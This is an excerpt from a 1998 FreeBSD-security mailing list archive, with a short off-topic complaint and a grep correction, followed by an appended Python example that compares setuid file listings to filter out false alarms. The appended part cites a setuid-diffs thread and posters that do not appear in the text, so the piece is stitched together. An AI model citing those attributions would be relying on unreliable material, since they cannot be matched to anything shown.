From: "H. Eckert" To: FreeBSD Security Cc: agora@uol.com.br Subject: Re: [Fwd: CERT Vendor-Initiated Bulletin VB-98.13 - Cisco_IOS_DFS] References: <3642D460.9205ECA2@agoractvm.com.br> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Mailer: Mutt 0.93.2i In-Reply-To: =?iso-8859-1?Q?=3C3642D460=2E9205ECA2=40agoractvm=2Ecom=2Ebr=3E=3B_from_?= =?iso-8859-1?Q?Teleinform=E1tica_on_Fri=2C_Nov_06=2C_1998_at_08:50:08AM_?= =?iso-8859-1?Q?-0200?= Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Quoting Teleinformática (agora@uol.com.br): > These vulnerabilities apply only to the Cisco 7xxx router family. The Cisco > 7xxx family are large, rack-mounted backbone routers used primarily by > Internet service providers and in large enterprise networks. Is there any direct relevance to FreeBSD as an operating system ? I don't think so, so this does *not* belong on freebsd-security. Greetings, Ripley -- H. Eckert, 10777 Berlin, Germany, http://www.in-berlin.de/User/nostromo/ ISO 8859-1: Ä=Ae, Ö=Oe, Ü=Ue, ä=ae, ö=oe, ü=ue, ß=sz. "(Technobabbel)" (Jetrel) - "Müssen wir uns diesen Schwachsinn wirklich anhören?" 
(Neelix) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Nov 7 16:15:24 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA28308 for freebsd-security-outgoing; Sat, 7 Nov 1998 16:15:24 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dt053n18.san.rr.com (dt053n18.san.rr.com [204.210.34.24]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id QAA28299 for ; Sat, 7 Nov 1998 16:15:23 -0800 (PST) (envelope-from Studded@gorean.org) Received: from gorean.org (Studded@localhost [127.0.0.1]) by dt053n18.san.rr.com (8.8.8/8.8.8) with ESMTP id QAA22202; Sat, 7 Nov 1998 16:14:48 -0800 (PST) (envelope-from Studded@gorean.org) Message-ID: <3644E278.B560D328@gorean.org> Date: Sat, 07 Nov 1998 16:14:48 -0800 From: Studded Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.5 [en] (X11; I; FreeBSD 2.2.7-STABLE-1101 i386) X-Accept-Language: en MIME-Version: 1.0 To: Nicholas Charles Brawn , FreeBSD-security@FreeBSD.ORG Subject: Re: [rootshell] Security Bulletin #25 (fwd) References: <3641C882.EA06705F@gorean.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Studded wrote: > > Nicholas Charles Brawn wrote: > > > > Well I just grabbed 1.2.26 and did: > > find . -exec grep sprintf {} \; |wc -l > > This is fairly tangential, but you could accomplish exactly the same > thing with just grep: grep -iRc sprintf * Errr... actually you can't. Sorry for the confusion, I'm going to go nap now. :) Doug To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
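The two false alarms discussed in the "*huge* setuid diffs" thread above (Eric Siegerman's case, where one size grows a digit and reflows every "ls -l" column, and Michael Lucas's case, where a clock and timezone reset changes only the rendered mtime) can be told apart from real changes by comparing the listings field by field instead of line by line. The following is an added example and not the /etc/security script; the two listings are constructed, and the pattern assumes FreeBSD "ls -lT" style lines.

```python
"""Field-wise comparison of two setuid listings (added example, not the
/etc/security script). A plain diff of "ls -l" lines raises false alarms
when one size grows a digit (every column reflows) or the clock/timezone
moves (every rendered mtime changes); parsed fields separate real changes.
The listings are constructed; lines follow FreeBSD "ls -lT" layout."""
import re

LINE_RE = re.compile(
    r"^(?P<mode>\S+)\s+(?P<links>\d+)\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+"
    r"(?P<size>\d+)\s+(?P<mtime>[A-Z][a-z]{2}\s+\d{1,2}\s+[\d:]+\s+\d{4})\s+"
    r"(?P<path>/\S+)$")
# A change in these fields means the file itself changed; mtime is kept apart.
SIGNIFICANT = ("mode", "links", "owner", "group", "size")

# Constructed "before" listing, as the nightly report would have saved it.
OLD = """\
-r-sr-xr-x  1 root  wheel     17276 Mar 24 20:51:04 1998 /bin/rcp
-r-xr-sr-x  1 bin   operator  53248 Mar 24 20:51:04 1998 /bin/df
-r-sr-xr-x  1 root  wheel    262144 Mar 24 20:51:04 1998 /usr/bin/login
"""
# Constructed "after": clock moved +5h (all mtimes differ) and /usr/bin/login
# grew by a digit, so every size column shifted right by one character.
NEW = """\
-r-sr-xr-x  1 root  wheel      17276 Mar 25 01:51:04 1998 /bin/rcp
-r-xr-sr-x  1 bin   operator   53248 Mar 25 01:51:04 1998 /bin/df
-r-sr-xr-x  1 root  wheel    1048576 Mar 25 01:51:04 1998 /usr/bin/login
"""

def parse(listing):
    """Return {path: fields}; refuse lines that are not ls -l shaped."""
    entries = {}
    for line in filter(str.strip, listing.splitlines()):
        m = LINE_RE.match(line)
        if m is None:
            raise ValueError("unparseable listing line: %r" % line)
        entries[m.group("path")] = m.groupdict()
    return entries

def raw_diff_count(old, new):
    """Lines a plain diff reports as removed: old lines with no exact twin."""
    new_lines = set(new.splitlines())
    return sum(1 for line in old.splitlines() if line not in new_lines)

def compare(old, new):
    """Classify each path as added, removed, changed or timestamp_only.
    timestamp_only is reported, not dropped: a replacement binary of the
    same size and ownership would show up only there."""
    a, b = parse(old), parse(new)
    out = {"added": [], "removed": [], "changed": [], "timestamp_only": []}
    for path in sorted(set(a) | set(b)):
        if path not in a:
            out["added"].append(path)
        elif path not in b:
            out["removed"].append(path)
        else:
            diffs = ["%s: %s -> %s" % (f, a[path][f], b[path][f])
                     for f in SIGNIFICANT if a[path][f] != b[path][f]]
            if diffs:
                out["changed"].append((path, "; ".join(diffs)))
            elif a[path]["mtime"] != b[path]["mtime"]:
                out["timestamp_only"].append(path)
    return out
```

On the constructed listings a plain diff flags all three lines as removed, while compare() reports only /usr/bin/login as changed and lists /bin/df and /bin/rcp as timestamp-only, which is the class a clock reset produces and which still deserves a checksum comparison before being dismissed.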